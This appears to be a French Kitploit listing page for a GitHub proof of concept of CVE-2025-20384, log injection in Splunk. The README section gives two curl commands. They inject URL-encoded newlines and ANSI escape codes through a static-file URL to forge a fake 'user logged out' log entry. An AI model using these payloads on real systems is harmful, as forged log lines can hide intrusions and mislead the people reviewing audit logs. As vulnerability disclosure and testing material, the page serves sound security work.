Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-20384 — Preuve de concept démontrant l'injection et l'empoisonnement de journaux dans Splunk via des paramètres d'URL malveillants, mettant en évidence les risques d'injection de journaux OWASP. | Kitploit
Outils/GitHubGitHub/axselll/cve-2025-20384
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionApprentissage et ÉducationAnalyse de Journaux
GitHubaxselll/cve-2025-20384

CVE-2025-20384

Preuve de concept démontrant l'injection et l'empoisonnement de journaux dans Splunk via des paramètres d'URL malveillants, mettant en évidence les risques d'injection de journaux OWASP.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SPLUNK CVE-2025-20384

je ne sais pas, j'ai juste lu des trucs que mon pote m'a envoyés et j'ai commencé à taper un code javascript de merde au hasard

POC de type Injection/Falsification/Empoisonnement/Obscurcissement de logs

Veuillez lire cet article OWASP Log Injection

TL;DR

  • Recherchez un fichier statique, passez-le et ajoutez un paramètre aléatoire

  • Donc, je lance curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"

  • Si vous voyez une nouvelle ligne aléatoire apparaître, c'est un empoisonnement. Cela peut sembler anodin car ce n'est qu'un empoisonnement « normal », mais cela peut être gênant si c'est fortement ciblé.

Réf.

Lien vers l'enregistrement CVE

Télécharger l’outil